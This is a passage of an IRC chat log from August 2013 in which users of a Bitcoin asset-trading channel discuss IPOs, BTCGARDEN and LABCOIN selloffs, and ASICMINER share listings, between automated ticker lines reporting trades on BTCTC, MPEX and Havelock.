BTC [-] Aug 03 13:15:25 Why did people buy 2000 BTC worth instantly? No one buys my BTC-BOND. Must be because it's not an IPO. Aug 03 13:15:33 IPO = Instant frenzy Aug 03 13:16:16 [BTCTC] [ACTIVEMINING] 1 @ 0.00577 BTC [-] Aug 03 13:16:19 [BTCTC] [LABCOIN] 83 @ 0.001929 = 0.1601 BTC [-] Aug 03 13:16:20 [BTCTC] [LABCOIN] 37 @ 0.00193 = 0.0714 BTC [+] Aug 03 13:16:38 namworld you first need a picture of a fpga to enable ipo frenzy Aug 03 13:16:40 its not that easy Aug 03 13:16:54 [BTCTC] [LABCOIN] 1 @ 0.001929 BTC [-] Aug 03 13:17:50 [BTCTC] [BTCGARDEN] 100 @ 0.01787 = 1.787 BTC [+] Aug 03 13:17:51 [BTCTC] [BTCGARDEN] 100 @ 0.01788 = 1.788 BTC [+] Aug 03 13:18:02 [BTCTC] [BTCGARDEN] 600 @ 0.01788 = 10.728 BTC [+] Aug 03 13:18:11 [BTCTC] [BTCGARDEN] 68 @ 0.01786 = 1.2145 BTC [-] Aug 03 13:18:13 afaik those guys are the owners of the chinese version of bitcointalk + an exchange Aug 03 13:18:32 [BTCTC] [BTCGARDEN] 32 @ 0.01786 = 0.5715 BTC [-] Aug 03 13:18:34 [BTCTC] [BTCGARDEN] 8 @ 0.01786 = 0.1429 BTC [-] Aug 03 13:18:41 [BTCTC] [BTCGARDEN] 1 @ 0.017 BTC [-] Aug 03 13:18:42 [BTCTC] [BTCGARDEN] 100 @ 0.017 = 1.7 BTC [-] Aug 03 13:18:44 [BTCTC] [BTCGARDEN] 399 @ 0.017 = 6.783 BTC [-] Aug 03 13:19:04 smidge, cool Aug 03 13:19:13 [BTCTC] [BTCGARDEN] 500 @ 0.01701 = 8.505 BTC [+] Aug 03 13:20:36 if you have any suggestions or comments to dcx please post them Aug 03 13:20:51 Nam, weren't you trying to buy back your bonds? Aug 03 13:20:57 [BTCTC] [BTCGARDEN] 100 @ 0.01701 = 1.701 BTC [+] Aug 03 13:20:59 [BTCTC] [BTCGARDEN] 16 @ 0.01701 = 0.2722 BTC [+] Aug 03 13:21:26 [BTCTC] [BTCGARDEN] 200 @ 0.01784 = 3.568 BTC [+] Aug 03 13:21:27 [BTCTC] [BTCGARDEN] 100 @ 0.01784 = 1.784 BTC [+] Aug 03 13:21:28 [BTCTC] [BITVPS] 20 @ 0.002015 = 0.0403 BTC [+] Aug 03 13:21:29 [BTCTC] [BTCGARDEN] 500 @ 0.01785 = 8.925 BTC [+] Aug 03 13:21:31 [BTCTC] [BTCGARDEN] 400 @ 0.01785 = 7.14 BTC [+] Aug 03 13:21:31 [BTCTC] [BTCGARDEN] 92 @ 0.01786 = 1.6431 BTC [+] Aug 03 13:21:32 [BTCTC] [BTCGARDEN] 50 @ 0.01789 = 0.8945 BTC [+] Aug 03 13:21:33 [BTCTC] [BTCGARDEN] 50 @ 0.01789 = 0.8945 BTC [+] Aug 03 13:21:34 [BTCTC] [BTCGARDEN] 450 @ 0.01789 = 8.0505 BTC [+] Aug 03 13:21:35 [BTCTC] [BTCGARDEN] 25 @ 0.01789 = 0.4473 BTC [+] Aug 03 13:21:37 [BTCTC] [BTCGARDEN] 1 @ 0.0179 BTC [+] Aug 03 13:21:38 [BTCTC] [BTCGARDEN] 9 @ 0.0179 = 0.1611 BTC [+] Aug 03 13:21:39 [BTCTC] [BTCGARDEN] 773 @ 0.0179 = 13.8367 BTC [+] Aug 03 13:21:40 [BTCTC] [BTCGARDEN] 200 @ 0.0179 = 3.58 BTC [+] Aug 03 13:22:16 [BTCTC] [BTCGARDEN] 184 @ 0.01702 = 3.1317 BTC [-] Aug 03 13:22:45 [BTCTC] [BTCGARDEN] 6 @ 0.01792 = 0.1075 BTC [+] Aug 03 13:24:41 [BTCTC] [BTCGARDEN] 1 @ 0.0179 BTC [-] Aug 03 13:24:43 [BTCTC] [BTCGARDEN] 200 @ 0.0179 = 3.58 BTC [-] Aug 03 13:24:54 smidge: http://imgur.com/xpxM4MQ Aug 03 13:25:06 I'm ready for IPO now. Aug 03 13:25:07 haha Aug 03 13:25:37 (plus mandatory AM initials for extra credit) Aug 03 13:26:09 now post a cgminer shot of your usb miner and you're off Aug 03 13:26:16 i'm buyin Aug 03 13:26:21 TaT, I was during the epic price rise, but not anymore. Trying to fill 500 BTC borrowed. Aug 03 13:26:34 thought that was a raspi for a moment Aug 03 13:27:14 [BTCTC] [ACTIVEMINING] 1412 @ 0.005763 = 8.1374 BTC [-] Aug 03 13:31:24 [BTCTC] [BTCGARDEN] 1 @ 0.01702 BTC [-] Aug 03 13:31:37 Smidge, get a new avatar plz Aug 03 13:31:50 career advice Aug 03 13:31:51 [BTCTC] [BTCGARDEN] 415 @ 0.01702 = 7.0633 BTC [-] Aug 03 13:31:53 [BTCTC] [BTCGARDEN] 300 @ 0.01702 = 5.106 BTC [-] Aug 03 13:31:54 [BTCTC] [BTCGARDEN] 80 @ 0.01702 = 1.3616 BTC [-] Aug 03 13:31:55 [BTCTC] [BTCGARDEN] 100 @ 0.01702 = 1.702 BTC [-] Aug 03 13:32:46 [BTCTC] [BTCGARDEN] 100 @ 0.017 = 1.7 BTC [-] Aug 03 13:35:47 [BTCTC] [LABCOIN] 257 @ 0.00185 = 0.4755 BTC [-] Aug 03 13:36:32 [BTCTC] [BTCGARDEN] 20 @ 0.01783 = 0.3566 BTC [+] Aug 03 13:37:35 [HAVELOCK] [XBOND] 5 @ 0.001029 = 0.0051 BTC [-] Aug 03 13:41:36 ;;nethash Aug 03 13:41:36 299128.154226 Aug 03 13:41:42 ;;bcstats Aug 03 13:41:45 Current Blocks: 249981 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 2 blocks | Next Difficulty In About: 14 minutes and 7 seconds | Next Difficulty Estimate: 37377184.4683 | Estimated Percent Change: 19.58035 Aug 03 13:42:00 so close! Aug 03 13:42:18 :D Aug 03 13:43:35 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [+] Aug 03 13:43:37 [BTCTC] [ASICMINER-PT] 1 @ 3.952 BTC [-] Aug 03 13:45:47 here is one possible outcome of what will happen next: people realize they won't double their coins, sell into the .016 wall and buy other currently cheaper assets (basically those dumped before) ;) is that possible? Aug 03 13:46:39 smidge: http://i.imgur.com/laEoiBQ.png Aug 03 13:47:42 [BTCTC] [ACTIVEMINING] 1 @ 0.005796 BTC [+] Aug 03 13:48:17 [BTCTC] [ACTIVEMINING] 327 @ 0.005763 = 1.8845 BTC [-] Aug 03 13:48:25 i see Aug 03 13:48:28 btct is broken Aug 03 13:48:46 [BTCTC] [BTCGARDEN] 60 @ 0.01702 = 1.0212 BTC [-] Aug 03 13:48:47 [BTCTC] [BTCGARDEN] 30 @ 0.017 = 0.51 BTC [-] Aug 03 13:48:49 [BTCTC] [BTCGARDEN] 1 @ 0.017 BTC [-] Aug 03 13:48:50 [BTCTC] [BTCGARDEN] 8 @ 0.01675 = 0.134 BTC [-] Aug 03 13:48:51 [BTCTC] [BTCGARDEN] 10 @ 0.0165 = 0.165 BTC [-] Aug 03 13:48:52 [BTCTC] [BTCGARDEN] 11 @ 0.0165 = 0.1815 BTC [-] Aug 03 13:48:53 [BTCTC] [BTCGARDEN] 80 @ 0.0163 = 1.304 BTC [-] Aug 03 13:48:55 [BTCTC] [BTCGARDEN] 445 @ 0.0178 = 7.921 BTC [+] Aug 03 13:49:22 [BTCTC] [ACTIVEMINING] 9 @ 0.005248 = 0.0472 BTC [-] Aug 03 13:50:01 [BTCTC] [BFMINES] 3 @ 0.003995 = 0.012 BTC [+] Aug 03 13:50:15 [BTCTC] [BTCGARDEN] 10 @ 0.01778 = 0.1778 BTC [-] Aug 03 13:50:25 [BTCTC] [BTCGARDEN] 105 @ 0.01778 = 1.8669 BTC [-] Aug 03 13:50:55 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1951 = 0.9755 BTC [-] Aug 03 13:50:57 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [-] Aug 03 13:50:58 [BTCTC] [CRYPTO-TRADE] 10 @ 0.195 = 1.95 BTC [-] Aug 03 13:50:59 [BTCTC] [CRYPTO-TRADE] 10 @ 0.194 = 1.94 BTC [-] Aug 03 13:51:34 why is asicminer-pt going down, isn't that the only company actually working Aug 03 13:51:38 [BTCTC] [DMS.MINING] 40 @ 0.01134 = 0.4536 BTC [-] Aug 03 13:51:48 [BTCTC] [BTCGARDEN] 50 @ 0.01776 = 0.888 BTC [-] Aug 03 13:51:59 [BTCTC] [BTCGARDEN] 290 @ 0.01772 = 5.1388 BTC [-] Aug 03 13:52:03 dandate2 on the short term the market is a nutty machine Aug 03 13:52:10 wow the btcgarden selloff happened quicker than I would have thought Aug 03 13:52:22 ArcticWolf famous last words, those. Aug 03 13:52:49 [BTCTC] [BTCGARDEN] 72 @ 0.0177 = 1.2744 BTC [-] Aug 03 13:52:52 [BTCTC] [BTCGARDEN] 378 @ 0.0177 = 6.6906 BTC [-] Aug 03 13:52:53 [BTCTC] [BTCGARDEN] 357 @ 0.0177 = 6.3189 BTC [-] Aug 03 13:52:55 [BTCTC] [BTCGARDEN] 310 @ 0.01772 = 5.4932 BTC [+] Aug 03 13:53:00 people selling to get on ride with ipo's most likely. Aug 03 13:53:01 true - I have probably just jinxed it Aug 03 13:53:08 [BTCTC] [BTCGARDEN] 355 @ 0.01772 = 6.2906 BTC [+] Aug 03 13:53:11 [BTCTC] [ACTIVEMINING] 9 @ 0.005792 = 0.0521 BTC [+] Aug 03 13:53:12 [BTCTC] [ACTIVEMINING] 65 @ 0.005793 = 0.3765 BTC [+] Aug 03 13:53:13 [BTCTC] [ACTIVEMINING] 50 @ 0.005794 = 0.2897 BTC [+] Aug 03 13:53:15 [BTCTC] [ACTIVEMINING] 201 @ 0.005797 = 1.1652 BTC [+] Aug 03 13:53:16 [BTCTC] [ACTIVEMINING] 175 @ 0.00597 = 1.0448 BTC [+] Aug 03 13:53:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.03687 = 0.295 BTC [-] Aug 03 13:53:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.03687 = 0.2212 BTC [-] Aug 03 13:53:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.03687 BTC [-] Aug 03 13:53:31 [BTCTC] [ACTIVEMINING] 25 @ 0.005259 = 0.1315 BTC [-] Aug 03 13:53:33 [BTCTC] [ACTIVEMINING] 70 @ 0.005258 = 0.3681 BTC [-] Aug 03 13:53:35 [BTCTC] [DMS.MINING] 142 @ 0.01134 = 1.6103 BTC [-] Aug 03 13:54:25 [BTCTC] [BTCGARDEN] 355 @ 0.01772 = 6.2906 BTC [+] Aug 03 13:54:26 [BTCTC] [DMS.MINING] 348 @ 0.01134 = 3.9463 BTC [-] Aug 03 13:54:30 [BTCTC] [TAT.ASICMINER] 17 @ 0.03686 = 0.6266 BTC [-] Aug 03 13:54:39 [BTCTC] [BTCGARDEN] 80 @ 0.01772 = 1.4176 BTC [+] Aug 03 13:55:02 [BTCTC] [ASICMINER-PT] 7 @ 4 = 28 BTC [+] Aug 03 13:55:10 [BTCTC] [BTCGARDEN] 20 @ 0.01773 = 0.3546 BTC [+] Aug 03 13:55:12 [BTCTC] [BTCGARDEN] 40 @ 0.01772 = 0.7088 BTC [-] Aug 03 13:55:39 [BTCTC] [TAT.ASICMINER] 61 @ 0.037 = 2.257 BTC [+] Aug 03 13:57:02 [BTCTC] [BTCGARDEN] 43 @ 0.0177 = 0.7611 BTC [-] Aug 03 13:59:38 I'm out, so long. Aug 03 13:59:49 [BTCTC] [BTCGARDEN] 1 @ 0.0176 BTC [-] Aug 03 13:59:58 [BTCTC] [DMS.PURCHASE] 100 @ 0.03394 = 3.394 BTC [-] Aug 03 14:00:30 [BTCTC] [BTCGARDEN] 299 @ 0.0176 = 5.2624 BTC [-] Aug 03 14:00:44 cya Aug 03 14:01:07 [BTCTC] [ACTIVEMINING] 2 @ 0.005957 = 0.0119 BTC [+] Aug 03 14:03:32 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [+] Aug 03 14:04:10 [BTCTC] [ASICMINER-PT] 2 @ 3.956 = 7.912 BTC [-] Aug 03 14:04:34 [BTCTC] [LABCOIN] 33 @ 0.001909 = 0.063 BTC [+] Aug 03 14:05:04 [BTCTC] [ASICMINER-PT] 1 @ 3.955 BTC [-] Aug 03 14:05:33 [BTCTC] [LABCOIN] 87 @ 0.001909 = 0.1661 BTC [+] Aug 03 14:05:35 [MPEX] [S.MPOE] 1626 @ 0.00082178 = 1.3362 BTC [-] Aug 03 14:05:37 [MPEX] [S.MPOE] 2443 @ 0.00082127 = 2.0064 BTC [-] Aug 03 14:05:38 [MPEX] [S.MPOE] 3223 @ 0.00082043 = 2.6442 BTC [-] Aug 03 14:05:42 [BTCTC] [BTCGARDEN] 12 @ 0.01745 = 0.2094 BTC [-] Aug 03 14:05:50 [BTCTC] [ASICMINER-PT] 1 @ 3.954 BTC [-] Aug 03 14:06:23 [BTCTC] [ASICMINER-PT] 1 @ 3.951 BTC [-] Aug 03 14:07:23 [BTCTC] [ASICMINER-PT] 2 @ 3.95 = 7.9 BTC [-] Aug 03 14:07:43 [BTCTC] [LABCOIN] 8 @ 0.001851 = 0.0148 BTC [-] Aug 03 14:07:44 [BTCTC] [LABCOIN] 1 @ 0.001851 BTC [-] Aug 03 14:07:46 [BTCTC] [LABCOIN] 50 @ 0.00185 = 0.0925 BTC [-] Aug 03 14:07:47 [BTCTC] [LABCOIN] 33 @ 0.001815 = 0.0599 BTC [-] Aug 03 14:07:47 [BTCTC] [LABCOIN] 200 @ 0.001814 = 0.3628 BTC [-] Aug 03 14:07:48 [BTCTC] [LABCOIN] 94 @ 0.001813 = 0.1704 BTC [-] Aug 03 14:07:49 [BTCTC] [LABCOIN] 195 @ 0.001812 = 0.3533 BTC [-] Aug 03 14:08:20 [BTCTC] [BTCGARDEN] 176 @ 0.0172 = 3.0272 BTC [-] Aug 03 14:08:31 [BTCTC] [LABCOIN] 333 @ 0.001907 = 0.635 BTC [+] Aug 03 14:08:42 [BTCTC] [BTCGARDEN] 10 @ 0.01705 = 0.1705 BTC [-] Aug 03 14:09:11 [BTCTC] [BTCGARDEN] 100 @ 0.01744 = 1.744 BTC [+] Aug 03 14:09:34 [BTCTC] [BTCGARDEN] 3 @ 0.01706 = 0.0512 BTC [-] Aug 03 14:09:36 [BTCTC] [BTCGARDEN] 40 @ 0.01705 = 0.682 BTC [-] Aug 03 14:09:37 [BTCTC] [BTCGARDEN] 777 @ 0.01705 = 13.2479 BTC [-] Aug 03 14:09:38 [BTCTC] [BTCGARDEN] 60 @ 0.01705 = 1.023 BTC [-] Aug 03 14:09:39 [BTCTC] [BTCGARDEN] 60 @ 0.01705 = 1.023 BTC [-] Aug 03 14:09:40 [BTCTC] [BTCGARDEN] 1 @ 0.01705 BTC [-] Aug 03 14:09:50 [BTCTC] [BTCGARDEN] 103 @ 0.01745 = 1.7974 BTC [+] Aug 03 14:10:04 tat i wont get a new avatar Aug 03 14:10:12 you will learn to love it i am sure Aug 03 14:10:32 [BTCTC] [BTCGARDEN] 59 @ 0.01744 = 1.029 BTC [-] Aug 03 14:10:37 like mircea did Aug 03 14:10:41 :D Aug 03 14:10:47 [BTCTC] [LABCOIN] 88 @ 0.001908 = 0.1679 BTC [+] Aug 03 14:11:00 so be it Aug 03 14:11:05 [BTCTC] [BTCGARDEN] 50 @ 0.01767 = 0.8835 BTC [+] Aug 03 14:11:40 [BTCTC] [BTCGARDEN] 357 @ 0.01768 = 6.3118 BTC [+] Aug 03 14:12:31 [BTCTC] [BTCGARDEN] 417 @ 0.01769 = 7.3767 BTC [+] Aug 03 14:12:41 [MPEX] [S.MPOE] 1200 @ 0.00082403 = 0.9888 BTC [+] Aug 03 14:12:42 [MPEX] [S.MPOE] 2112 @ 0.00082451 = 1.7414 BTC [+] Aug 03 14:13:06 [BTCTC] [BTCGARDEN] 457 @ 0.0177 = 8.0889 BTC [+] Aug 03 14:13:43 [BTCTC] [BTCGARDEN] 213 @ 0.01769 = 3.768 BTC [-] Aug 03 14:14:40 [HAVELOCK] [XBOND] 10 @ 0.001029 = 0.0103 BTC [-] Aug 03 14:15:04 lmao by the look of the trades teh btcgarden people are getting raped. Aug 03 14:15:12 they push it, then let it be at which point it drops Aug 03 14:15:20 this is like the 7th or 8th cycle of it Aug 03 14:15:41 granted it's only a few btc per cycle they lose, but i imagine a few btc hurt a lot in scamistan. Aug 03 14:16:37 is there a btct price tracker for ios? Aug 03 14:16:52 [BTCTC] [BTCGARDEN] 80 @ 0.01769 = 1.4152 BTC [-] Aug 03 14:18:24 [BTCTC] [BTCGARDEN] 1 @ 0.0176 BTC [-] Aug 03 14:20:12 is there IRC for ios? Aug 03 14:20:33 yeah Aug 03 14:24:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.03986 = 0.2392 BTC [+] Aug 03 14:25:25 there you go Aug 03 14:25:29 load that Aug 03 14:25:49 and go to the #bitcoin-assets-trades channel Aug 03 14:25:55 what is the difference between tat.asicminer and asicminer-pt ? Aug 03 14:26:11 it's mostly described if you read them Aug 03 14:26:39 i is can't read Aug 03 14:27:03 sounds like most investors Aug 03 14:27:14 actually i really don't nuderstand the difference after reading it heh Aug 03 14:27:23 lol scrat Aug 03 14:27:24 looks like i'm buying a fraction of what i bought on the -pt Aug 03 14:27:32 i think nuderstand will become a meme Aug 03 14:27:49 .bait nuderstand Aug 03 14:27:53 http://24.media.tumblr.com/bd10af63c7386930c270def5da154bfc/tumblr_mg5ic22REu1r62m2no1_500.jpg Aug 03 14:28:00 pakistand Aug 03 14:28:06 an app would be easier just with ticker of each listing Aug 03 14:28:10 that's about as far removed from NUDE as it could be ozbot Aug 03 14:28:13 sorta like bitcoin ticker Aug 03 14:28:22 kidkrypto make it. Aug 03 14:28:25 make the app Aug 03 14:28:33 sell for .1 btc Aug 03 14:28:41 s'all good Aug 03 14:29:08 i know very little programming Aug 03 14:29:27 i might draw up some templates and see how much it'd cost to get made on freelancer, can't imagine it'd take much work though Aug 03 14:29:39 just pay someone here Aug 03 14:30:03 either way. Aug 03 14:30:03 scrat do you do project work? Aug 03 14:30:08 who does around here? Aug 03 14:30:48 whats ios, obj c or something Aug 03 14:31:01 flash i think Aug 03 14:31:06 heh Aug 03 14:31:08 :) Aug 03 14:32:30 kidkrypto: there was a seperate url for the realtime tab of btct Aug 03 14:33:14 not sure how to find it, but i think it was posted by burnside in the btc-tc thread Aug 03 14:33:54 i'll make a mock up of what i mean Aug 03 14:34:31 what exactly is tatinvestments that i would buy a bond in it? Aug 03 14:34:59 ThickAsThieves: busy with non bitcoin related projects Aug 03 14:36:09 does that mean i am sponsoring thickasthieves to make investment decisions and pay me interest for the money? Aug 03 14:36:19 or is there some product being sold Aug 03 14:37:00 XBOND is debt issued Aug 03 14:37:13 TAT Investments pays interest Aug 03 14:37:21 [BTCTC] [ASICMINER-PT] 2 @ 4.089 = 8.178 BTC [+] Aug 03 14:37:23 [BTCTC] [ASICMINER-PT] 5 @ 4.09 = 20.45 BTC [+] Aug 03 14:40:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.03984 = 0.1195 BTC [-] Aug 03 14:40:39 [BTCTC] [TAT.ASICMINER] 30 @ 0.03985 = 1.1955 BTC [+] Aug 03 14:45:42 102.7 seems to be a hard resistance :) http://dcx.smidge.com/ Aug 03 14:46:24 [BTCTC] [BTCGARDEN] 50 @ 0.0175 = 0.875 BTC [-] Aug 03 14:47:08 [BTCTC] [BTCGARDEN] 65 @ 0.0175 = 1.1375 BTC [-] Aug 03 14:50:35 [HAVELOCK] [XBOND] 8 @ 0.001029 = 0.0082 BTC [-] Aug 03 14:54:42 [BTCTC] [LABCOIN] 1 @ 0.001906 BTC [-] Aug 03 14:55:09 what is the difference between S.MOE and S.BBET? Aug 03 14:55:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.03985 BTC [+] Aug 03 14:55:34 one is called S.MOE and the other S.BBET. Aug 03 14:55:40 [BTCTC] [BTCGARDEN] 20 @ 0.01748 = 0.3496 BTC [-] Aug 03 14:57:06 [BTCTC] [BTCGARDEN] 5 @ 0.01748 = 0.0874 BTC [-] Aug 03 14:57:08 [BTCTC] [BTCGARDEN] 40 @ 0.01749 = 0.6996 BTC [+] Aug 03 14:57:19 [BTCTC] [BTCGARDEN] 7 @ 0.01749 = 0.1224 BTC [+] Aug 03 14:57:47 [BTCTC] [BTCGARDEN] 3 @ 0.01749 = 0.0525 BTC [+] Aug 03 14:57:49 [BTCTC] [BTCGARDEN] 77 @ 0.0175 = 1.3475 BTC [+] Aug 03 14:58:40 [BTCTC] [BTCGARDEN] 1 @ 0.0175 BTC [+] Aug 03 14:59:12 [BTCTC] [BTCGARDEN] 5 @ 0.0175 = 0.0875 BTC [+] Aug 03 14:59:54 http://bitcoinmagazine.com/the-bitcoin-gambling-diaspora/ Aug 03 14:59:59 The Bitcoin Gambling Diaspora | Bitcoin MagazineBitcoin Magazine Aug 03 15:00:00 [HAVELOCK] [XBOND] [PAID] 1.00000000 BTC to 2`000`000 shares, 50 satoshi per share Aug 03 15:01:29 [BTCTC] [DMS.MINING] 3 @ 0.01143 = 0.0343 BTC [+] Aug 03 15:01:48 [BTCTC] [DMS.MINING] 7 @ 0.01143 = 0.08 BTC [+] Aug 03 15:02:09 [HAVELOCK] [SMG] 10 @ 0.000244 = 0.0024 BTC [+] Aug 03 15:05:47 [BTCTC] [LABCOIN] 1 @ 0.001822 BTC [-] Aug 03 15:08:26 [HAVELOCK] [XBOND] 1 @ 0.00102888 BTC [-] Aug 03 15:10:25 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [+] Aug 03 15:10:27 ;;hashrate Aug 03 15:10:28 Error: "hashrate" is not a valid command. Aug 03 15:10:48 ;;nethash Aug 03 15:10:49 298343.540747 Aug 03 15:12:41 http://www.npr.org/blogs/money/2013/08/02/208078183/four-reasons-why-millions-of-americans-are-leaving-the-workforce Aug 03 15:12:45 4 Reasons Why Millions Of Americans Are Leaving The Workforce : Planet Money : NPR Aug 03 15:13:05 [HAVELOCK] [XBOND] 35 @ 0.00102888 = 0.036 BTC [-] Aug 03 15:13:12 "A much larger swath of people — about 36 percent of U.S. adults — don't have jobs and aren't looking for work at all. That figure is higher than it's been in decades (and, conversely, the share of adults in the labor force — shown in the graph above — is lower than it's been in decades)." Aug 03 15:13:15 [BTCTC] [BTCGARDEN] 13 @ 0.01749 = 0.2274 BTC [-] Aug 03 15:13:26 heh. Aug 03 15:13:37 "why work if you get shit for free anyway" Aug 03 15:13:46 36% of US is trading on BTCT Aug 03 15:13:48 not really any need for the other three reasons Aug 03 15:16:04 [BTCTC] [LABCOIN] 70 @ 0.001905 = 0.1334 BTC [+] Aug 03 15:16:08 http://www.npr.org/blogs/money/2013/07/30/206961493/nyt-excerpt-radical-accounting-and-the-value-of-ideas Aug 03 15:16:10 NYT Excerpt: Radical Accounting And The Value Of Ideas : Planet Money : NPR Aug 03 15:16:19 "It's relatively easy to figure out if steel companies can make a ton of steel more efficiently than in the past (they can, by a lot), but we have no idea how to measure the financial value of ideas and the people who come up with them. " Aug 03 15:16:23 mircea, help them out Aug 03 15:16:31 they cant figure out the value of 0 Aug 03 15:16:47 [BTCTC] [BTCGARDEN] 1 @ 0.0174 BTC [-] Aug 03 15:17:00 [BTCTC] [LABCOIN] 8 @ 0.001904 = 0.0152 BTC [-] Aug 03 15:17:35 [HAVELOCK] [LABCO] 150 @ 0.003 = 0.45 BTC [+] Aug 03 15:18:14 [BTCTC] [LABCOIN] 1 @ 0.001821 BTC [-] Aug 03 15:18:16 [BTCTC] [LABCOIN] 5 @ 0.00182 = 0.0091 BTC [-] Aug 03 15:18:17 [BTCTC] [LABCOIN] 3 @ 0.00182 = 0.0055 BTC [-] Aug 03 15:18:18 [BTCTC] [LABCOIN] 47 @ 0.001818 = 0.0854 BTC [-] Aug 03 15:18:19 [BTCTC] [LABCOIN] 287 @ 0.001817 = 0.5215 BTC [-] Aug 03 15:18:21 [BTCTC] [LABCOIN] 72 @ 0.001817 = 0.1308 BTC [-] Aug 03 15:18:22 [BTCTC] [LABCOIN] 100 @ 0.001816 = 0.1816 BTC [-] Aug 03 15:18:22 [BTCTC] [LABCOIN] 2800 @ 0.001815 = 5.082 BTC [-] Aug 03 15:18:23 [BTCTC] [LABCOIN] 200 @ 0.001813 = 0.3626 BTC [-] Aug 03 15:18:24 [BTCTC] [LABCOIN] 2305 @ 0.001812 = 4.1767 BTC [-] Aug 03 15:18:25 [BTCTC] [LABCOIN] 300 @ 0.001811 = 0.5433 BTC [-] Aug 03 15:18:26 [BTCTC] [LABCOIN] 700 @ 0.00181 = 1.267 BTC [-] Aug 03 15:18:28 [BTCTC] [LABCOIN] 2767 @ 0.001803 = 4.9889 BTC [-] Aug 03 15:18:29 [BTCTC] [LABCOIN] 3 @ 0.001802 = 0.0054 BTC [-] Aug 03 15:18:30 [BTCTC] [LABCOIN] 1 @ 0.0018 BTC [-] Aug 03 15:18:31 [BTCTC] [LABCOIN] 52 @ 0.001759 = 0.0915 BTC [-] Aug 03 15:18:32 [BTCTC] [LABCOIN] 357 @ 0.001756 = 0.6269 BTC [-] Aug 03 15:23:54 [BTCTC] [BASIC-MINING] 3 @ 0.4048 = 1.2144 BTC [+] Aug 03 15:23:54 [BTCTC] [BASIC-MINING] 1 @ 0.4048 BTC [+] Aug 03 15:23:55 [BTCTC] [BASIC-MINING] 3 @ 0.4048 = 1.2144 BTC [+] Aug 03 15:23:57 [BTCTC] [BASIC-MINING] 1 @ 0.4049 BTC [+] Aug 03 15:24:49 [BTCTC] [BASIC-MINING] 2 @ 0.4079 = 0.8158 BTC [+] Aug 03 15:25:45 [BTCTC] [BITVPS] 1 @ 0.0021 BTC [+] Aug 03 15:26:20 [BTCTC] [BITVPS] 250 @ 0.002016 = 0.504 BTC [-] Aug 03 15:26:44 [BTCTC] [BFMINES] 200 @ 0.003996 = 0.7992 BTC [+] Aug 03 15:26:45 [BTCTC] [BFMINES] 200 @ 0.003998 = 0.7996 BTC [+] Aug 03 15:26:46 [BTCTC] [BFMINES] 10 @ 0.003999 = 0.04 BTC [+] Aug 03 15:26:48 [BTCTC] [BFMINES] 84 @ 0.004 = 0.336 BTC [+] Aug 03 15:27:01 [BTCTC] [BITVPS] 373 @ 0.002015 = 0.7516 BTC [-] Aug 03 15:27:02 [BTCTC] [BITVPS] 191 @ 0.002 = 0.382 BTC [-] Aug 03 15:27:20 [BTCTC] [LABCOIN] 8 @ 0.001762 = 0.0141 BTC [+] Aug 03 15:27:21 [BTCTC] [LABCOIN] 1 @ 0.001761 BTC [-] Aug 03 15:27:23 [BTCTC] [LABCOIN] 330 @ 0.00176 = 0.5808 BTC [-] Aug 03 15:27:24 [BTCTC] [LABCOIN] 20 @ 0.001758 = 0.0352 BTC [-] Aug 03 15:27:25 [BTCTC] [LABCOIN] 1240 @ 0.001756 = 2.1774 BTC [-] Aug 03 15:27:59 [BTCTC] [LABCOIN] 2544 @ 0.001756 = 4.4673 BTC [-] Aug 03 15:29:19 [BTCTC] [BFMINES] 29 @ 0.003401 = 0.0986 BTC [-] Aug 03 15:29:29 [BTCTC] [BTCGARDEN] 1 @ 0.01735 BTC [-] Aug 03 15:29:30 [BTCTC] [BTCGARDEN] 1 @ 0.01735 BTC [-] Aug 03 15:29:30 [BTCTC] [BTCGARDEN] 1 @ 0.0171 BTC [-] Aug 03 15:29:32 [BTCTC] [BTCGARDEN] 6 @ 0.01707 = 0.1024 BTC [-] Aug 03 15:29:33 [BTCTC] [BTCGARDEN] 300 @ 0.01706 = 5.118 BTC [-] Aug 03 15:29:34 [BTCTC] [BTCGARDEN] 165 @ 0.01701 = 2.8067 BTC [-] Aug 03 15:29:35 [BTCTC] [BTCGARDEN] 1050 @ 0.017 = 17.85 BTC [-] Aug 03 15:29:36 [BTCTC] [BTCGARDEN] 800 @ 0.01631 = 13.048 BTC [-] Aug 03 15:29:37 [BTCTC] [BTCGARDEN] 607 @ 0.01631 = 9.9002 BTC [-] Aug 03 15:29:38 [BTCTC] [BTCGARDEN] 4 @ 0.01631 = 0.0652 BTC [-] Aug 03 15:29:39 [BTCTC] [BTCGARDEN] 120 @ 0.0163 = 1.956 BTC [-] Aug 03 15:29:41 [BTCTC] [BTCGARDEN] 400 @ 0.01621 = 6.484 BTC [-] Aug 03 15:29:41 [BTCTC] [BTCGARDEN] 122 @ 0.0161 = 1.9642 BTC [-] Aug 03 15:29:42 [BTCTC] [BTCGARDEN] 1 @ 0.01601 BTC [-] Aug 03 15:29:43 [BTCTC] [BTCGARDEN] 500 @ 0.01601 = 8.005 BTC [-] Aug 03 15:29:44 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [-] Aug 03 15:29:45 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 03 15:29:46 [BTCTC] [BTCGARDEN] 2750 @ 0.016 = 44 BTC [-] Aug 03 15:31:40 [BTCTC] [LABCOIN] 100 @ 0.00175 = 0.175 BTC [-] Aug 03 15:31:41 [BTCTC] [LABCOIN] 150 @ 0.00175 = 0.2625 BTC [-] Aug 03 15:31:42 [BTCTC] [BTCGARDEN] 6 @ 0.01748 = 0.1049 BTC [+] Aug 03 15:31:44 [BTCTC] [LABCOIN] 200 @ 0.001732 = 0.3464 BTC [-] Aug 03 15:31:45 [BTCTC] [LABCOIN] 240 @ 0.001732 = 0.4157 BTC [-] Aug 03 15:31:46 [BTCTC] [LABCOIN] 4 @ 0.001755 = 0.007 BTC [+] Aug 03 15:32:25 [BTCTC] 